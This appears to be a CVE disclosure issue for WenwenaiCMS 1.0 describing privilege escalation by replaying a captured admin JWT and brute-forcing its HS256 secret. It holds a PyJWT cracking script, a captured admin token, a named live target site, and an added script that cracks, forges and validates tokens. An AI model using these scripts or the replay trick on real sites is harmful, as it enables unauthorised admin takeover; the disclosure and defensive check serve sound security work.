CVE-2023-45990: WenwenAiCms Vulnerability Testing · Issue #2 · PwnCYN/Wenwenai
Insecure Permissions vulnerability in WenwenaiCMS v.1.0 allows a remote attacker to escalate privileges.
Product Name:
Wenwenai CMS
Affected version:
1.0
Case Address:
Demo: https://chat.wenwen-ai.com/
Target: https://laoluoai.com/
Vulnerability Type:
Logic flaw (authentication bypass via a replayed or forged JWT)
Description:
Directory scanning turns up the backend login page. That page carries a link to the developer's demo site, and the demo site publishes a demo account and password. Logging in to the demo site with those credentials and intercepting the traffic captures the login response: a JSON body whose data field is a JWT with header {"alg":"HS256","typ":"JWT"} and payload {"username":"admin","id":2,"email":"admin@admin.com","role":"admin","openId":"","iat":1696935220,"exp":1697540020}, i.e. an admin identity valid for seven days (exp - iat = 604800 s).
The token shows that the site authenticates requests by verifying a JWT. Because the signature is HS256 over a shared secret, the secret can be recovered offline by brute-forcing candidate keys against this one captured token (script below); nothing is sent to the server, so rate limiting does not help.
On any site running the same CMS, logging in with unknown credentials returns a 400 error. Intercepting that response and replacing it with the successful login response captured from the demo site passes the front end's JWT check and opens the backend. Note that swapping the response only convinces the browser: the backend API accepts the replayed token only if the target shares the demo site's signing secret, or if the attacker re-signs the admin claims with the secret recovered above.
Blasting (brute-forcing the HS256 secret with PyJWT):
```python
import jwt  # PyJWT
import termcolor

if __name__ == "__main__":
    # Token taken from the demo site's login response (see Poc below)
    jwt_str = r'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
    # topred.txt: one candidate secret per line
    with open('topred.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                # PyJWT 2.x: the algorithm must be pinned explicitly and the
                # old verify= argument no longer exists
                jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                # The signature verified and only a claim check failed (the captured
                # token is already past its exp), so this is the right key
                pass
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                continue
            print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
            break
        else:
            print('\r', '\bsorry! no key was found!')
```
Poc (login response captured from the demo site; the message field reads "request successful"):
```http
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding

{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}
```
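The full chain behind the description above, as an added example that is not the reporter's script or the CMS's code: decode the captured token, recover an HS256 secret offline by dictionary attack, mint a fresh admin token with it, and the server-side check that rejects replayed or expired tokens. It uses only the standard library, so it does not depend on the PyJWT version. PAGE_TOKEN is the real token from the Poc; WORDLIST, DEMO_SECRET, DEMO_TOKEN, FORGED_ADMIN and token_status are constructed for the example (the CMS's real secret is not known from the report, so the demo token is re-signed under an assumed secret to make the attack reproducible).

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Token returned by the demo site's login endpoint (copied from the Poc above).
PAGE_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic"

# Constructed stand-ins for the report's topred.txt and for the (unknown) real
# secret: DEMO_SECRET is an assumption used only to sign tokens for this demo.
WORDLIST = ["123456", "password", "jwt_secret", "wenwen", "secret123", "admin888"]
DEMO_SECRET = "secret123"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop the '=' padding; put it back before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_header(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def decode_payload(token: str) -> dict:
    # No signature check here: the claims are readable by anyone holding the token
    return json.loads(b64url_decode(token.split(".")[1]))


def hs256_sig(signing_input: str, secret: str) -> str:
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return b64url_encode(mac)


def signature_matches(token: str, secret: str) -> bool:
    """True if the third segment is HMAC-SHA256(header.payload, secret)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hs256_sig(f"{header_b64}.{payload_b64}", secret)
    return hmac.compare_digest(expected, sig_b64)


def crack_secret(token: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on an HS256 token: one HMAC per candidate and
    no requests to the server, so login rate limiting never sees it."""
    if decode_header(token).get("alg") != "HS256":
        raise ValueError("only HS256 (shared-secret) tokens can be cracked this way")
    for candidate in wordlist:
        if signature_matches(token, candidate):
            return candidate
    return None


def forge_token(claims: dict, secret: str) -> str:
    """Mint a token the server will accept once the secret is known."""
    compact = {"separators": (",", ":")}
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    payload_b64 = b64url_encode(json.dumps(claims, **compact).encode())
    signing_input = f"{header_b64}.{payload_b64}"
    return f"{signing_input}.{hs256_sig(signing_input, secret)}"


def token_status(token: str, secret: str, now: Optional[int] = None) -> str:
    """Server-side check: pin the algorithm, verify the MAC, then enforce exp.
    Returns 'ok' or the reason for rejection (what a backend should log)."""
    try:
        header_b64, payload_b64, _ = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:  # bad segment count, bad base64, bad JSON
        return "malformed"
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return "unexpected alg"  # defeats alg=none / key-confusion tricks
    if not signature_matches(token, secret):
        return "bad signature"
    now = int(time.time()) if now is None else now
    if not isinstance(claims, dict) or "exp" not in claims or now >= int(claims["exp"]):
        return "expired"
    return "ok"


# Same claims as the captured token, re-signed under the demo secret: stands in
# for a target instance whose secret is in the wordlist.
DEMO_TOKEN = forge_token(decode_payload(PAGE_TOKEN), DEMO_SECRET)
# Same admin identity with a fresh validity window: what an attacker mints after cracking.
FORGED_ADMIN = forge_token(
    {**decode_payload(PAGE_TOKEN), "iat": 1700000000, "exp": 1700000000 + 7 * 86400},
    DEMO_SECRET,
)

if __name__ == "__main__":
    print("claims in captured token:", decode_payload(PAGE_TOKEN))
    print("secret recovered from demo token:", crack_secret(DEMO_TOKEN, WORDLIST))
    print("captured token vs this wordlist:", crack_secret(PAGE_TOKEN, WORDLIST))
    print("forged admin token at 1700000001:", token_status(FORGED_ADMIN, DEMO_SECRET, now=1700000001))
    print("captured claims replayed today:", token_status(DEMO_TOKEN, DEMO_SECRET))
```

Two points worth noticing when running it: crack_secret works on the token alone, so the only defence is a secret with enough entropy that no wordlist contains it (or an asymmetric algorithm such as RS256/ES256, which leaves nothing to brute-force); and token_status rejects the captured token today only because exp has passed, which is why a seven-day admin token with no server-side revocation is a problem in its own right.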